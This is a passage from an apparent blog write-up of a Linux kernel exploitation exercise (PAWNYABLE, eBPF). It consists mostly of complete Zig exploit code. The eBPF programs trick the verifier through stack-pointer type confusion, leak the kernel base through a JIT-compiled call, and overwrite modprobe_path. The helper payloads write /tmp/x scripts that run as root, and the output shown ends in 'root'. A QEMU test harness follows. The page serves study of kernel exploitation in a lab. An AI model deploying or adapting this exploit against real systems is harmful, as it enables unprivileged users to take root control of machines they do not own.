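       So how do we defeat KASLR?
       An instruction that calls an eBPF helper becomes an x86 `call` instruction after JIT compilation: leaking that instruction together with its own address is enough to compute the helper's address, and from that the kernel base address.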
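As a worked example of that calculation, here is a small standalone sketch that decodes an `e8 rel32` call with explicit sign extension. The two kernel constants are the ones used by the exploit on this page; the JIT address, the KASLR slide, and the helper names `callTarget` and `encodeCall` are assumptions made up for the demonstration.

```zig
const std = @import("std");

// Constants taken from the exploit on this page (addresses without KASLR).
const KERNEL_BASE_NOKASLR: u64 = 0xffffffff81000000;
const BPF_USER_RND_U32: u64 = 0xffffffff810e4590;

/// Absolute target of an x86-64 `call rel32` located at `insn_addr`.
fn callTarget(insn_addr: u64, insn: [5]u8) u64 {
    std.debug.assert(insn[0] == 0xe8);
    // rel32 is a signed displacement relative to the next instruction
    const rel = std.mem.readInt(i32, insn[1..5], .little);
    const next_insn = insn_addr +% 5;
    return next_insn +% @as(u64, @bitCast(@as(i64, rel)));
}

/// Demo-only helper: encodes a `call` from `insn_addr` to `target`.
fn encodeCall(insn_addr: u64, target: u64) [5]u8 {
    var insn = [_]u8{ 0xe8, 0, 0, 0, 0 };
    const rel: i32 = @truncate(@as(i64, @bitCast(target -% (insn_addr +% 5))));
    std.mem.writeInt(i32, insn[1..5], rel, .little);
    return insn;
}

pub fn main() void {
    const slide: u64 = 0x1a800000; // hypothetical KASLR slide
    const jit_addr: u64 = 0xffffffffc0001000; // hypothetical JIT address
    const insn = encodeCall(jit_addr, BPF_USER_RND_U32 + slide);

    // What the exploit does with the two leaked values:
    const leaked_slide = callTarget(jit_addr, insn) - BPF_USER_RND_U32;
    std.debug.print("kernel base: 0x{x}\n", .{KERNEL_BASE_NOKASLR + leaked_slide});
}
```

The `call_decoder` function in the exploit reaches the same result by forcing the upper 32 bits to ones instead of sign-extending, which works as long as the target lies in the kernel text range.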
       
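       When an eBPF helper[^fn:9] is called, the return address is pushed onto the stack.
       By building a fake `sk_buff` on the stack and handing it to `skb_load_bytes`, we can read that return address back from the stack (note: this never leaks a stack address, only the address of the JIT-compiled eBPF program).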
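To make the fake `sk_buff` easier to follow, the sketch below models only the two offsets that `kaslr_leak` writes to: 0x68 and 0xb8. The field names are an assumption (the exploit's constants suggest a length field at 0x68 and the `data` pointer at 0xb8 for this particular kernel build; other builds will differ), and `FakeSkb` and `fakeSkbBase` are hypothetical names.

```zig
const std = @import("std");

/// Partial, assumed layout of `struct sk_buff` for the target kernel.
/// Only the offsets written by the exploit are modelled.
const FakeSkb = extern struct {
    _unused_head: [0x68]u8,
    len: u32, // assumed: skb->len at 0x68
    data_len: u32, // assumed: skb->data_len at 0x6c
    _unused_mid: [0xb8 - 0x70]u8,
    data: u64, // assumed: skb->data at 0xb8
};

/// The exploit places the fake skb so that its `data` field ends at r8.
fn fakeSkbBase(r8: u64) u64 {
    return r8 - (0x8 + 0xb8);
}

pub fn main() void {
    const r8: u64 = 0x7000; // stand-in for the runtime value of r8
    const skb = fakeSkbBase(r8);
    std.debug.print("&skb       = r8-0x{x}\n", .{r8 - skb});
    std.debug.print("&skb->len  = r8-0x{x}\n", .{r8 - (skb + @offsetOf(FakeSkb, "len"))});
    std.debug.print("&skb->data = r8-0x{x}\n", .{r8 - (skb + @offsetOf(FakeSkb, "data"))});
}
```

Under these assumptions, the 8-byte store of 0x100 at offset 0x68 sets the length to 0x100 and leaves the paged-data length at zero, so `skb_load_bytes` copies straight from the pointer stored in `data`.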
       <<pawnyable-lib>>
       <<lk06-bpf>>
       
       var MODPROBE_PATH: u64 = 0xffffffff81e37fe0;
       const BPF_USER_RND_U32: u64 = 0xffffffff810e4590;
       
       fn call_decoder(address: u64, insn: []const u8) u64 {
           const builtin = @import("builtin");
           std.debug.assert(builtin.target.cpu.arch == .x86_64);
           std.debug.assert(insn[0] == 0xe8 and insn.len == 5);
       
           return 0xffffffff00000000 | ((address + insn.len) +% std.mem.bytesToValue(u64, insn[1..5]));
       }
       
       fn exploit_prologue(mapfd: posix.fd_t) [26]BPF.Insn {
           return [_]BPF.Insn{
               .mov(.r6, .r1),
               .st(.double_word, .r10, -0x8, 0),
       
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .call(.map_lookup_elem),
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, 0),
               .exit(),
               .mov(.r9, .r0),
       
               .ldx(.double_word, .r1, .r9, 0),
               .rsh(.r1, 32),
               .lsh(.r1, 32),
       
               .alu(64, .mov, .r2, @as(i32, @bitCast(@as(u32, 0xfffffffe)))),
               .lsh(.r2, 32),
               .add(.r2, 1),
       
               .alu_or(.r1, .r2),
               // R1 \in [1, 0] = 1
       
               .ldx(.double_word, .r2, .r9, 0),
               .jmp(.jle, .r2, 1, 2),
               .mov(.r0, 0),
               .exit(),
               // R2 \in [0, 1] = 1
       
               .add(.r1, .r2),
               .alu(32, .mov, .r1, .r1),
               .sub(.r1, 1),
               .stx(.double_word, .r10, -0x10, .r1),
           };
       }
       
       fn exploit_stack_confusion() [155]BPF.Insn {
           // results are stored in r7 (a frame pointer that the verifier thinks points to fp-0x18 but doesn't) and r8 (a frame pointer that points to the same place as the corrupted frame pointer but it is consistent with the verifier)
           // in other words, use r8 to load a malicious value, load the innocent value into r10-0x18, and load from r7 to get type confusion
           var ret: [155]BPF.Insn = undefined;
           const _insns = comptime blk: {
               var insns: []const BPF.Insn = &.{};
               insns = insns ++ [_]BPF.Insn{
                   // load fp-0x18 on the stack
                   .mov(.r1, .r10),
                   .add(.r1, -0x20),
                   .stx(.double_word, .r10, -0x18, .r1),
       
                   .mov(.r1, .r6), // skb->data == "foobared\x00\x08"
                   .mov(.r2, 0),
                   // 8 bytes before the last byte of the to-be-corrupted stack pointer
                   .mov(.r3, .r10),
                   .add(.r3, -0x20),
                   // r4 (expected: 0x8, actual: 0x9)
                   .ldx(.double_word, .r4, .r10, -0x10),
                   .add(.r4, 0x8),
                   .call(.skb_load_bytes),
                   // r7 = (fp-0x20) - [0, 0xf8]
                   .ldx(.double_word, .r7, .r10, -0x18),
               };
       
               // zero out the stack
               for (1..0xf8/8+1) |_i| {
                   const i: i16 = @intCast(_i);
                   insns = insns ++ [_]BPF.Insn{
                       .st(.double_word, .r10, -0x18-8*i, 0),
                   };
               }
       
               insns = insns ++ [_]BPF.Insn{
                   // load a special value somewhere on the stack
                   .ldx(.double_word, .r1, .r9, 0),
                   .stx(.double_word, .r7, 0, .r1), // r1 == 1, but the verifier doesn't know that
       
                   // special case for if the pointer was left unchanged
                   .ldx(.double_word, .r1, .r10, -0x20),
                   .jmp(.jne, .r1, 1, 14),
                   // this will always result in r7 being (expected: fp-0x20, actual: fp-0x18)
                   .mov(.r1, .r10),
                   .add(.r1, -0x20),
                   .stx(.double_word, .r10, -0x18, .r1),
                   .mov(.r1, .r6),
                   .mov(.r2, 1), // now the last byte is 0x8, not 0x0
                   .mov(.r3, .r10),
                   .add(.r3, -0x20),
                   .ldx(.double_word, .r4, .r10, -0x10),
                   .add(.r4, 0x8),
                   .call(.skb_load_bytes),
                   .ldx(.double_word, .r7, .r10, -0x18),
                   .mov(.r8, .r10),
                   .add(.r8, -0x18),
                   .jmp(.ja, .r0, 0, (0xf8/8)*3+2), // "exit" by skipping the rest of the program
       
                   .mov(.r8, .r10),
                   .add(.r8, -0x18),
               };
       
               // search the stack for the special value
               for (1..0xf8/8+1) |_i| {
                   const i: i16 = @intCast(_i);
                   insns = insns ++ [_]BPF.Insn{
                       .add(.r8, -0x8),
                       .ldx(.double_word, .r1, .r8, 0),
                       .jmp(.jeq, .r1, 1, (0xf8/8-i)*3),
                   };
               }
       
               break :blk &insns;
           };
       
           @memcpy(&ret, _insns.*);
           return ret;
       }
       
       fn overwrite_modprobe_path() !void {
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 1);
       
           const insns = exploit_prologue(mapfd) ++ exploit_stack_confusion() ++ [_]BPF.Insn{
               // type confusion of r1 (expected: fp-0x8, actual: MODPROBE_PATH)
               _ld_dw1(.r1, MODPROBE_PATH),
               _ld_dw2(MODPROBE_PATH),
               .stx(.double_word, .r8, 0, .r1),
               .mov(.r1, .r10),
               .add(.r1, -0x8),
               .stx(.double_word, .r10, -0x20, .r1),
               .ldx(.double_word, .r1, .r7, 0),
       
               _ld_dw1(.r2, std.mem.bytesAsValue(u64, "/tmp/x\x00").*),
               _ld_dw2(std.mem.bytesAsValue(u64, "/tmp/x\x00").*),
               .stx(.double_word, .r1, 0, .r2),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           try bpf_helper(mapfd, &insns, "foobar");
       }
       
       fn kaslr_leak() !u64 {
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 3);
       
           const insns = exploit_prologue(mapfd) ++ exploit_stack_confusion() ++ [_]BPF.Insn{
               // type confusion: r1 (expected: scalar, actual: fp)
               .stx(.double_word, .r8, 0, .r10),
               .st(.double_word, .r10, -0x20, 0xdead),
               .ldx(.double_word, .r1, .r7, 0),
       
               .add(.r1, -0x190), // fp-0x190, this is where the saved return address is stored
       
               // construct a fake skb on the stack
               .stx(.double_word, .r8, -0x8, .r1), // skb->data = fp-0x190 (the data pointer sits at skb+0xb8)
               .st(.double_word, .r8, -(0x8+(0xb8-0x68)), 0x100), // 8-byte store at skb+0x68: presumably skb->len = 0x100 and skb->data_len = 0
               .mov(.r1, .r8),
               .add(.r1, -(0x8+0xb8)), // &skb
               .stx(.double_word, .r8, 0, .r1),
       
               // type confusion: r1 (expected: ctx, actual: pointer to the fake skb on the stack)
               .stx(.double_word, .r10, -0x20, .r6),
               .ldx(.double_word, .r1, .r7, 0),
       
               .mov(.r2, 0),
               .mov(.r3, .r8),
               .add(.r3, -0x10),
               .mov(.r4, 8),
               .call(.skb_load_bytes),
       
               // the address of this instruction is now in r8-0x10
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 0,
                   .off = 0,
                   .imm = 7,
               },
       
               // map[1] = &call_instruction
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .st(.double_word, .r10, -0x8, 1),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r3, .r8),
               .add(.r3, -0x10),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               // type confusion: r1 (expected: fp-0x8, actual: &call_instruction)
               .ldx(.double_word, .r1, .r8, -0x10),
               .stx(.double_word, .r8, 0, .r1),
               .mov(.r1, .r10),
               .add(.r1, -0x8),
               .stx(.double_word, .r10, -0x20, .r1),
               .ldx(.double_word, .r1, .r7, 0),
       
               // map[2] = call_instruction
               .mov(.r3, .r1),
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .st(.double_word, .r10, -0x8, 2),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           // idk why but adding \x00\x08 to the end doesn't work as expected
           try bpf_helper(mapfd, &insns, "foobared");
       
           var buf: [2]u64 = undefined;
           for (0..2) |i| try BPF.map_lookup_elem(mapfd, &std.mem.toBytes(@as(i32, @intCast(i+1))), std.mem.asBytes(&buf[i]));
       
           return call_decoder(buf[0], std.mem.asBytes(&buf[1])[0..5]) - BPF_USER_RND_U32;
       }
       
       pub fn main() !void {
           try confirm_unpriviledged_bpf();
       
           const kaslr_offset = try kaslr_leak();
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           MODPROBE_PATH += kaslr_offset;
       
           try overwrite_modprobe_path();
       
           modprobePath();
       }
       whoami: unknown uid 1337
       [INFO] User is not bpf_capable
       [INFO] Kernel base: 0xffffffff9b800000
       [INFO] You won!!
       root
       
 (DIR) Full exploit
       
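       I actually also wanted to exploit this "without using the BPF stack", but could not manage it.
       (I tried techniques along the lines of PageJack [10] and DirtyCred [11], but could not get the cred_jar cache allocated on the freed pages. Heap feng shui is hard.)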
       
       == Org-babel section
       
       
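       I use Org-babel for exploit development (it is something like a Jupyter notebook; if you are curious, the related topic is literate programming).
       
       Executing a code block does the following:
       
       1.  The Zig source is extracted and compiled
       2.  The rootfs is regenerated
       3.  A shell is started in QEMU, the input string is sent to it, and the command output is read back
       
       That's not all!
       This page is the same Org content, exported with ox-hugo [12].
       Pretty cool, right? (At least I think so.)
       
       Below are the various functions used on this page.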
       const std = @import("std");
       
       const linux = std.os.linux;
       const posix = std.posix;
       
       pub const std_options = std.Options{
           .log_level = if (@hasDecl(@This(), "DEBUG")) .debug else .info,
           .logFn = pawnyableLogger,
       };
       
       pub fn pawnyableLogger(
           comptime level: std.log.Level,
           comptime _: @Type(.enum_literal),
           comptime format: []const u8,
           args: anytype,
       ) void {
           const prefix = "[" ++ comptime blk: {
               const level_text = switch (level) {
                   .debug => "DBUG",
                   .info => "INFO",
                   .warn => "WARN",
                   .err => "ERRR",
               };
               var buf: [level_text.len]u8 = undefined;
               break :blk std.ascii.upperString(&buf, level_text);
           } ++ "] ";
       
           std.debug.lockStdErr();
           defer std.debug.unlockStdErr();
           const stderr = std.io.getStdErr().writer();
           nosuspend stderr.print(prefix ++ format ++ "\n", args) catch return;
       }
       
       
       fn bigEndianify(comptime len: usize, buf: []const u8) [len]u8 {
           var bufLE: [len]u8 = undefined;
           inline for (0..len) |i| bufLE[i] = buf[len-1-i];
           return bufLE;
       }
       
       var __spinlock: bool = false;
       inline fn spin() void {
           while (true) if (__spinlock) break;
       }
       
       export var user_cs: u64 = 0;
       export var user_ss: u64 = 0;
       export var user_rsp: u64 = 0;
       export var user_rflags: u64 = 0;
       
       fn saveState() callconv(.C) void {
           asm volatile (
             \\.intel_syntax noprefix
             \\mov user_cs, cs
             \\mov user_ss, ss
             \\mov user_rsp, rsp
             \\pushfq
             \\pop qword ptr user_rflags
             \\.att_syntax
           );
       }
       
       fn whoami() void {
           std.log.info("You won!!", .{});
       
           const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
           const env = [_:null]?[*:0]u8{};
           switch (posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
               else => unreachable,
           }
           unreachable;
       }
       
       fn modprobePath() void {
           std.log.info("You won!!", .{});
       
           const tmpx = std.fs.cwd().createFile(
               "/tmp/x", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           tmpx.writeAll(
               \\#!/bin/sh
               \\/usr/bin/whoami &> /tmp/whoisit
               \\chmod 777 /tmp/whoisit
           ) catch unreachable;
           tmpx.close();
       
           const unknown = std.fs.cwd().createFile(
               "/tmp/unknown", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           unknown.writeAll(&[_]u8{0xff}**4) catch unreachable;
           unknown.close();
       
           posix.exit(0);
       }
       
       fn corePattern() void {
           std.log.info("You won!!", .{});
       
           const tmpx = std.fs.cwd().createFile(
               "/tmp/x", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           tmpx.writeAll(
               \\#!/bin/sh
               \\/usr/bin/whoami &> /tmp/whoisit
               \\chmod 777 /tmp/whoisit
           ) catch unreachable;
           tmpx.close();
       
           switch (posix.fork() catch unreachable) {
               0 => posix.abort(),
               else => |pid| _ = posix.waitpid(pid, 0),
           }
       
           const flag = std.fs.openFileAbsolute("/tmp/whoisit", .{}) catch {
               std.log.err("Failed to open /tmp/whoisit", .{});
               posix.abort();
           };
           defer flag.close();
           std.debug.print("{s}", .{(flag.reader().readBoundedBytes(32) catch unreachable).constSlice()});
       
           posix.exit(0);
       }
       
       fn catchSigsegv(comptime handler: *const fn () void) void {
           const wrapper = struct { fn wrapper(_: i32) callconv(.C) void { handler(); } }.wrapper;
           const sigact = posix.Sigaction{
               .handler = .{ .handler = &wrapper },
               .mask = posix.empty_sigset,
               .flags = 0,
           };
           posix.sigaction(posix.SIG.SEGV, &sigact, null);
       }
       const pinThreadToCore = (struct {
           const pthread = @cImport({
               @cDefine("_GNU_SOURCE", {});
               @cInclude("pthread.h");
           });
       
           fn pinThreadToCore(thread: std.Thread.Handle, core: usize) !void {
               var cpu = std.bit_set.ArrayBitSet(usize, linux.CPU_SETSIZE*@sizeOf(usize)).initEmpty();
               cpu.set(core);
       
               const err = pthread.pthread_setaffinity_np(@ptrCast(thread), @sizeOf(posix.cpu_set_t), @ptrCast(&@as(posix.cpu_set_t, @bitCast(cpu.masks))));
               switch (@as(posix.E, @enumFromInt(err))) {
                   .SUCCESS => return,
                   .FAULT => unreachable,
                   .INVAL => return error.InvalidArgument,
                   .SRCH => return error.ProcessNotFound,
                   else => |e| return posix.unexpectedErrno(e),
               }
           }
       }).pinThreadToCore;
       mkdir -p rootfs; cd rootfs
       cpio -id < ../rootfs.cpio 2>/dev/null
       ls
       pushd rootfs
       find . -print0 | cpio --null --format=newc -o 2>/dev/null > ../rootfs.cpio
       cd ..
       set -e
       
       if [ ! "$libc" = true ]; then
           libc=""
       else
           libc="-lc"
       fi
       
       input=$(mktemp --suffix=.zig)
       echo "$code" > $input
       zig build-exe $libc -femit-bin=exploit -target x86_64-linux-musl $input
       rm exploit.o
       rm $input
       
       mv exploit ./rootfs/
       if [ "$root" = true ]; then
           suid=0
       else
           suid=1337
       fi
       if [ ! "$kaslr" = true ]; then
           export NOKASLR=1
       fi
       temp=$(mktemp)
       chmod 755 $temp
       
       cp rootfs/etc/init.d/S99pawnyable $temp
       sed -i -E "s/(setuidgid) [[:digit:]]+ (sh)/\1 $suid \2/" rootfs/etc/init.d/S99pawnyable
       <<regenerate-rootfs>>
       mv $temp rootfs/etc/init.d/S99pawnyable
       
       ./run.sh &
       sleep 2
       { echo -n; sleep 1; echo "$shellcmd; exit #^"; } | socat -t 2 -,ignoreeof UNIX:vm.sock
       
       If you want to become a better programmer, consider applying to the Recurse Center [13].
       
       [^fn:1]: I had help from AI with the prose, but did not use it for the code.
       [^fn:2]: https://elixir.bootlin.com/linux/v5.10.7/source/include/linux/tty.h#L285-L345 [14]
       [^fn:3]: For details on using `tty_struct` in a pwn context, see here [15] and here [16].
       [^fn:4]: `read`, `write`, and the like apparently have other security measures [17], so I use `ioctl` for now.
       [^fn:5]: SLUB Internals for Exploit Developers [18]
       [^fn:6]: Linux SLUB Allocator Internals and Debugging, Part 1 of 4 [19]
       [^fn:7]: https://docs.kernel.org/admin-guide/mm/userfaultfd.html#creating-a-userfaultfd [20]
       [^fn:8]: This page is licensed under CC BY 4.0 [21]; all eBPF bytecode is additionally licensed under GPLv3 [24].
       [^fn:9]: I originally tried to use subprograms, but those require bpf_capable privileges.
       
       References:
 (HTM)   [1] PAWNYABLE
 (HTM)   [2] Source
 (HTM)   [3] ptmx_fops
 (HTM)   [4] core_pattern
 (HTM)   [5] userfaultfd hello world
 (DIR)   [6] こち
 (HTM)   [7] studied
 (HTM)   [8] chompie
 (HTM)   [9] ptr-yudai
 (HTM)   [10] PageJack
 (HTM)   [11] DirtyCred
 (HTM)   [12] ox-hugo
 (HTM)   [13] Recurse Center
 (HTM)   [14] https://elixir.bootlin.com/linux/v5.10.7/source/include/linux/tty.h#L285-L345
 (HTM)   [15] here
 (HTM)   [16] here
 (HTM)   [17] other security measures
 (HTM)   [18] SLUB Internals for Exploit Developers
 (HTM)   [19] Linux SLUB Allocator Internals and Debugging, Part 1 of 4
 (HTM)   [20] https://docs.kernel.org/admin-guide/mm/userfaultfd.html#creating-a-userfaultfd
 (HTM)   [21] CC BY 4.0
 (HTM)   [22] image
 (HTM)   [23] image
 (HTM)   [24] GPLv3
       >=================================================================<
       
       copyright 2026 George Huebner
 (HTM) email